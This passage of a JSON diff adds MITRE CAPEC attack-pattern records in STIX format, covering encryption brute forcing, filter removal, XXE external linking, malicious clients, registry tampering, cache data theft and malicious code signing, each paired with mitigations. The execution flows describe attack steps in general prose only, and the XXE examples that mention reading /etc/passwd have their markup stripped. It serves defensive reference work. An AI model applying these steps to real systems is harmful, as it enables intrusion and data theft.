themselves.", + "id": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-2-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01ecb9a3-1f92-4fc8-879d-f7f3fb7ed660", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b357357-88e4-40f9-9345-ada3db593ff5", + "spec_version": "2.1", + "target_ref": "attack-pattern--4ee9fc30-e736-4f4f-b55b-8a3008214042", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker, armed with the cipher text and the encryption algorithm used, performs an exhaustive (brute force) search on the key space to determine the key that decrypts the cipher text to obtain the plaintext.", + "external_references": [ + { + "external_id": "CAPEC-20", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-326", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-1204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1204.html" + } + ], + "id": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "modified": "2021-06-24T00:00:00.000Z", + "name": 
"Encryption Brute Forcing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--f1336271-5f27-40de-a61b-aba6572d120f" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--8c806dfa-b8ca-45f9-9f97-09e4b5c1157b" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine the ciphertext and the encryption algorithm.

Experiment

  1. Perform an exhaustive brute force search of the key space, producing candidate plaintexts and observing if they make sense.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Ciphertext is known.", + "Encryption algorithm and key size are known." + ], + "x_capec_resources_required": [ + "\n A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).\n On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.\n Obviously as N gets large the brute force approach becomes infeasible.\n " + ], + "x_capec_skills_required": { + "Low": "Brute forcing encryption does not require much skill." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use commonly accepted algorithms and recommended key sizes. 
The key size used will depend on how important it is to keep the data confidential and for how long.", + "id": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--439ff02b-9273-4b92-9c82-0a6912ef0dc7", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--14ea1dd8-a232-4071-897a-a930751702bb", + "spec_version": "2.1", + "target_ref": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In theory a brute force attack performing an exhaustive key space search will always succeed, so the goal is to have computational security. 
Moore's law needs to be taken into account that suggests that computing resources double every eighteen months.", + "id": "course-of-action--8ce2fd56-5e92-4999-b81d-697c7ddb5202", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-20-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--24444738-98cb-4371-b7e9-aba1bd3d11ad", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ce2fd56-5e92-4999-b81d-697c7ddb5202", + "spec_version": "2.1", + "target_ref": "attack-pattern--86a5e931-7f53-46fe-b6f0-c88498f6557f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or disables filtering mechanisms on the target application. Input filters prevent invalid data from being sent to an application (for example, overly large inputs that might cause a buffer overflow or other malformed inputs that may not be correctly handled by an application). 
Input filters might also be designed to constrained executable content.", + "external_references": [ + { + "external_id": "CAPEC-200", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/200.html" + } + ], + "id": "attack-pattern--5c201b0f-aa6f-4220-a544-1e1e7ca8ecf7", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Removal of filters: Input filters, output filters, data masking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, if an application accepts scripting languages as input, an input filter could constrain the commands received and block those that the application's administrator deems to be overly powerful. An output filter screens responses from an application or person in order to prevent disclosure of sensitive information.\n For example, an application's output filter might block output that is sourced to sensitive folders or which contains certain keywords. A data mask is similar to an output filter, but usually applies to structured data, such as found in databases. Data masks elide or replace portions of the information returned from a query in order to protect against the disclosure of sensitive information. If an input filter is removed the attacker will be able to send content to the target and have the target utilize it without it being sanitized. If the content sent by the attacker is executable, the attacker may be able to execute arbitrary commands on the target. If an output filter or data masking mechanism is disabled, the target may send out sensitive information that would otherwise be elided by the filters. 
If the data mask is disabled, sensitive information stored in a database would be returned unaltered. This could result in the disclosure of sensitive information, such as social security numbers of payment records.\n This attack is usually executed as part of a larger attack series. The attacker would disable filters and would then mount additional attacks to either insert commands or data or query the target application in ways that would otherwise be prevented by the filters.\n ", + "x_capec_prerequisites": [ + "The target application must utilize some sort of filtering mechanism (input, output, or data masking)." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a serialized data file (e.g. XML, YAML, etc...) that contains an external data reference. Because serialized data parsers may not validate documents with external references, there may be no checks on the nature of the reference in the external data. 
This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.", + "external_references": [ + { + "external_id": "CAPEC-201", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "XXE (Xml eXternal Entity) Attack, Beyond Security", + "external_id": "REF-73", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securitynews/6D0100A5PU.html" + }, + { + "description": "CESA-2007-002 - rev 2: Sun JDK6 breaks XXE attack protection", + "external_id": "REF-74", + "source_name": "reference_from_CAPEC", + "url": "http://scary.beasts.org/security/CESA-2007-002.html" + } + ], + "id": "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Serialized Data External Linking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n The following DTD would attempt to open the /dev/tty device:\n ]>\n A malicious actor could use this crafted DTD to reveal sensitive information.\n ", + "\n The following XML snippet would attempt to open the /etc/passwd file:\n \n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of web services that process requests with serialized data.

  2. Techniques
    Use an automated tool to record all instances of URLs that process requests with serialized data.
    Use a browser to manually explore the website and analyze how the application processes serialized data requests.

Exploit

  1. Craft malicious payload: The adversary crafts malicious data message that contains references to sensitive files.

  2. Launch an External Linking attack: Send the malicious crafted message containing the reference to a sensitive file to the target URL.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must follow external data references without validating the validity of the reference target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To send serialized data messages with maliciously crafted schema." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure the serialized data processor to only retrieve external entities from trusted sources.", + "id": "course-of-action--5e577722-adf8-4c68-bfc3-18c7b2e3cd69", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-201-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d8b8b0b-8f2d-4cfd-a9fa-dd14e071f340", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e577722-adf8-4c68-bfc3-18c7b2e3cd69", + "spec_version": "2.1", + "target_ref": "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. 
Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures.", + "external_references": [ + { + "external_id": "CAPEC-202", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/202.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Create Malicious Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality.\n For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. 
However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.\n ", + "x_capec_prerequisites": [ + "The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary." + ], + "x_capec_resources_required": [ + "The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. 
Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.", + "external_references": [ + { + "external_id": "CAPEC-203", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/203.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "Modify Registry", + "external_id": "T1112", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1112" + }, + { + "description": "Plist Modification", + "external_id": "T1647", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1647" + } + ], + "id": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulate Registry Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Manipulating registration information can be undertaken in advance of a path traversal attack (inserting relative path modifiers) or buffer overflow attack (enlarging a registry value beyond an application's ability to store it)." 
+ ], + "x_capec_parent_of_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4", + "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b" + ], + "x_capec_prerequisites": [ + "The targeted application must rely on values stored in a registry.", + "The adversary must have a means of elevating permissions in order to access and modify registry content through either administrator privileges (e.g., credentialed access), or a remote access tool capable of editing a registry through an API." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary requires privileged credentials or the development/acquiring of a tailored remote access tool." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", + "id": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc7d659b-2cb2-439c-aea4-42aea4f82adc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "spec_version": "2.1", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", 
+ "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.", + "id": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--999b1481-d5c3-444d-8eed-b7f921aa8bdf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "spec_version": "2.1", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust identification and audit/blocking using an allowlist of applications on your system. 
Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", + "id": "course-of-action--2966a770-a439-475c-8cc1-418b64736efe", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90f1e2e6-849c-4469-b78d-75ed3dfe70e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2966a770-a439-475c-8cc1-418b64736efe", + "spec_version": "2.1", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines a target application's cache, or a browser cache, for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. 
This can result in the disclosure of sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-204", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-524", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/524.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + } + ], + "id": "attack-pattern--c2a87533-3c81-40b3-b529-9560c644f70d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Lifting Sensitive Data Embedded in Cache", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Application Cache: An adversary first identifies an application that utilizes a cache. This could either be a web application storing data in a browser cache, or an application running on a separate machine. The adversary examines the cache to determine file permissions and possible encryption.

  2. Techniques
    Use probing tools to look for application cache files on a machine.
    Use a web application and determine if any sensitive information is stored in browser cache.

Experiment

  1. Attempt to Access Cache: Once the cache has been discovered, the adversary attempts to access the cached data. This often requires previous access to a machine hosting the target application.

  2. Techniques
    Use priviledge escalation to access cache files that might have strict privileges.
    If the application cache is encrypted with weak encryption, attempt to understand the encryption technique and break the encryption.

Exploit

  1. Lift Sensitive Data from Cache: After gaining access to cached data, an adversary looks for potentially sensitive information and stores it for malicious use. This sensitive data could possibly be used in follow-up attacks related to authentication or authorization.

  2. Techniques
    Using a public computer, or gaining access to a victim's computer, examine browser cache to look for sensitive data left over from previous sessions.
", + "x_capec_prerequisites": [ + "The target application must store sensitive information in a cache.", + "The cache must be inadequately protected against attacker access." + ], + "x_capec_resources_required": [ + "The attacker must be able to reach the target application's cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-37 : Retrieve Embedded Sensitive Data. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-205", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/205.html" + } + ], + "id": "attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Lifting credential(s)/key material embedded in client distributions (thick or thin)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary extracts credentials used for code signing from a production environment and then uses these credentials to sign malicious content with the developer's key. 
Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the adversary has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the adversary to execute arbitrary code on the victim's computer. This differs from CAPEC-673, because the adversary is performing the code signing.", + "external_references": [ + { + "external_id": "CAPEC-206", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/206.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Subvert Trust Controls:Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + }, + { + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien, W32.Stuxnet Dossier, 2010--11, Symantec", + "external_id": "REF-699", + "source_name": "reference_from_CAPEC", + "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 3: How software becomes compromised, 2020--03---11, Microsoft", + "external_id": "REF-700", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/03/11/guarding-against-supply-chain-attacks-part-3-how-software-becomes-compromised/" + }, + { + "description": "Operation Wilted Tulip: Exposing a cyber espionage apparatus, 2017--07, ClearSky cyber security and Trend Micro", + "external_id": "REF-714", + 
"source_name": "reference_from_CAPEC", + "url": "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + } + ], + "id": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Signing Malicious Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n In the famous Stuxnet malware incident, two digital certificates were compromised in order to sign malicious device drivers with legitimate credentials. The signing resulted in the malware appearing as trusted by the system it was running on, which facilitated the installation of the malware in kernel mode. This further resulted in Stuxnet remaining undetected for a significant amount of time. [REF-699]\n ", + "\n The cyber espionage group CyberKittens leveraged a stolen certificate from AI Squared that allowed them to leverage a signed executable within Operation Wilted Tulip. This ultimately allowed the executable to run as trusted on the system, allowing a Crowd Strike stager to be loaded within the system's memory. [REF-714]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The adversary first attempts to obtain a digital certificate in order to sign their malware or tools. This certificate could be stolen, created by the adversary, or acquired normally through a certificate authority.

  2. Based on the type of certificate obtained, the adversary will create a goal for their attack. This is either a broad or targeted attack. If an adversary was able to steal a certificate from a targeted organization, they could target this organization by pretending to have legitimate code signed by them. In other cases, the adversary would simply sign their malware and pose as legitimate software such that any user might trust it. This is the more broad approach

Experiment

  1. The adversary creates their malware and signs it with the obtained digital certificate. The adversary then checks if the code that they signed is valid either through downloading from the targeted source or testing locally.

Exploit

  1. Once the malware has been signed, it is then deployed to the desired location. They wait for a trusting user to run their malware, thinking that it is legitimate software. This malware could do a variety of things based on the motivation of the adversary.

", + "x_capec_prerequisites": [ + "The targeted developer must use a signing key to sign code bundles. (Note that not doing this is not a defense - it only means that the adversary does not need to steal the signing key before forging code bundles in the developer's name.)" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure digital certificates are protected and inaccessible by unauthorized uses.", + "id": "course-of-action--ba7d1dc7-1157-4e70-bd60-0ffc00081dbb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9f7392ae-c45b-49fa-9355-c5319538ccd6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba7d1dc7-1157-4e70-bd60-0ffc00081dbb", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If a digital certificate has been compromised it should be revoked and regenerated.", + "id": 